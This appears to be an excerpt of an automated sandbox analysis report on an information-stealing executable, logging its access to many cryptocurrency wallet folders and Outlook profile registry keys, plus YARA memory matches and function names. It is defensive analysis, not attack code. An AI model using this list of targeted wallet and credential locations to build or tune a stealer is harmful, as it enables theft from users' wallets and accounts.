Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3B0C40 sqlite3_bind_zeroblob, 8_2_6C3B0C40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3B0D60 sqlite3_bind_parameter_name, 8_2_6C3B0D60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2D8EA0 sqlite3_clear_bindings, 8_2_6C2D8EA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 8_2_6C3B0B40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2DC030 sqlite3_bind_parameter_count, 8_2_6C2DC030
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2D6070 PR_Listen, 8_2_6C2D6070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 8_2_6C2DC050